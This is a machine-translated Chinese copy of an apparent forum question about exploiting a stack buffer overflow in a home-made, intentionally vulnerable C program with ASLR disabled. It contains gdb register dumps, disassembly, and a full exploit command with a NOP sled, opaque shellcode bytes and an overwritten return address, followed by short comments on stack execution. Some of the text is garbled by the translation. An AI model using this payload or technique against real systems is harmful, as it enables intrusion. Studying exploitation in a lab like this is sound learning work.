我正在通过一些缓冲区溢出漏洞利用示例工作,并编写了一个基本的易受攻击的C应用程序来测试:(目标和攻击者是相同的Kali 2计算机并运行“echo”0“>/proc/SYS /内核/ randomize_va_space“)现在缓冲区溢出漏洞利用示例
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char buffer[256];
if (argc != 2)
{
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
,在GDB一些测试我可以通过把260个字节的缓冲引起赛格故障:
r $(python -c 'print "A" * 204 + "BBBB" + "C" * 52')
与寄存器表示:
eax 0x105 261
ecx 0xffffd300 -11520
edx 0xf7fb3878 -134530952
ebx 0xf7fb2000 -134537216
esp 0xffffd300 0xffffd300
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x42424242 0x42424242
eflags 0x10286 [ PF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
我认为可以成功地获得EIP的控制下,给定上述0x424242(虽然EBP为0x0?)
问题1.
随着260个字节的缓冲,EIP被重写为以上。如果使用:
r $(python -c 'print "A" * 512')
我发现了SEGSEGV在0x080484b4与寄存器
eax 0x201 513
ecx 0x41414141 1094795585
edx 0xf7fb3878 -134530952
ebx 0xf7fb2000 -134537216
esp 0x4141413d 0x4141413d
ebp 0x41414141 0x41414141
esi 0x0 0
edi 0x0 0
eip 0x80484b4 0x80484b4 <main+89>
eflags 0x10286 [ PF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
我会想,如果EIP的260个增益控制,应该不是512字节的例子,以及?为什么512场景允许EIP在这种情况下指向ret,而不是在上面的260字节缓冲区示例中的0x424242?
问题2.
我已经创建了一个有效载荷是87个字节。我已注入的有效载荷到初始204个字节如下
r $(python -c 'print "\x90" * (204-87) + "<87 byte payload>" + "EIP <address>" + "\x90" * (260-204-4)')
我disas主要是如下
0x0804845b <+0>: lea 0x4(%esp),%ecx
0x0804845f <+4>: and $0xfffffff0,%esp
0x08048462 <+7>: pushl -0x4(%ecx)
0x08048465 <+10>: push %ebp
0x08048466 <+11>: mov %esp,%ebp
0x08048468 <+13>: push %ecx
0x08048469 <+14>: sub $0x104,%esp
0x0804846f <+20>: mov %ecx,%eax
0x08048471 <+22>: cmpl $0x2,(%eax)
0x08048474 <+25>: je 0x8048480 <main+37>
0x08048476 <+27>: sub $0xc,%esp
0x08048479 <+30>: push $0x0
0x0804847b <+32>: call 0x8048340 <[email protected]>
0x08048480 <+37>: mov 0x4(%eax),%eax
0x08048483 <+40>: add $0x4,%eax
0x08048486 <+43>: mov (%eax),%eax
0x08048488 <+45>: sub $0x8,%esp
0x0804848b <+48>: push %eax
0x0804848c <+49>: lea -0x108(%ebp),%eax
0x08048492 <+55>: push %eax
0x08048493 <+56>: call 0x8048310 <[email protected]>
0x08048498 <+61>: add $0x10,%esp
0x0804849b <+64>: sub $0xc,%esp
0x0804849e <+67>: lea -0x108(%ebp),%eax
0x080484a4 <+73>: push %eax
0x080484a5 <+74>: call 0x8048320 <[email protected]>
0x080484aa <+79>: add $0x10,%esp
0x080484ad <+82>: mov -0x4(%ebp),%ecx
0x080484b0 <+85>: leave
0x080484b1 <+86>: lea -0x4(%ecx),%esp
=> 0x080484b4 <+89>: ret
戴上56断裂(0x08048493)并检查ESP X/2wx $ ESP我可以发现:
0xffffd220: 0xffffd230 0xffffd56b
和X/S 0xffffd56b
0xffffd56b: 'A' <repeats 117 times>, 'B' <repeats 83 times>...
(gdb)
0xffffd633: "BBBBCCCC", 'D' <repeats 52 times>
所以,可以推断(希望正确地)EIP应\ X6B \ XD5 \ XFF \ XFF调用利用,并且(使用NOP雪橇)如下面代所有件:
r $(python -c 'print "\x90" * (204-87) + "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\xa9\xb2\x8c\x21\x7d\xac\xb1\x84\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xc3\x89\xd4\xb8\x35\x17\x9e\xe6\xc0\xdc\xa3\x52\x15\xac\xe2\xcc\x20\x55\xe4\x0c\x1e\xac\xb1\xcc\x20\x54\xde\xc9\x75\xac\xb1\x84\x86\xd0\xe5\x4f\x52\xdf\xd9\x84\xff\xe5\xc4\xa8\x9b\xa3\xb4\x84" + "\x6b\xd5\xff\xff" + "\x90" * (260-204-4)')
不幸的是,该程序现在通常以“[下1(进程2863)正常退出]”正常终止“。我是否错过了一些东西或者只是走了正确的道路...?另外我注意到在上面的陈述中没有不休息的休息时间?
- 编辑
重述屏幕步行从小时路程:)
现代操作系统不会让你修改指令,所以如果你试图覆盖一个ret指令,它会分段错误。另外,你是什么意思“填补EIP”? EIP是指令指针。 –
@BobbySacamano:不一定如果代码在堆栈上。该堆栈被读取和写入。并非所有的操作系统都阻止在堆栈上执行代码(因为有些操作系统把蹦床代码放在堆栈上)。缓冲区溢出代码将在堆栈中结束,因此它取决于操作系统是否允许在堆栈上执行代码。 –
@MichaelPetch哦好点。有时我会忘记数据执行攻击。我需要更多信息来回答这个问题。 –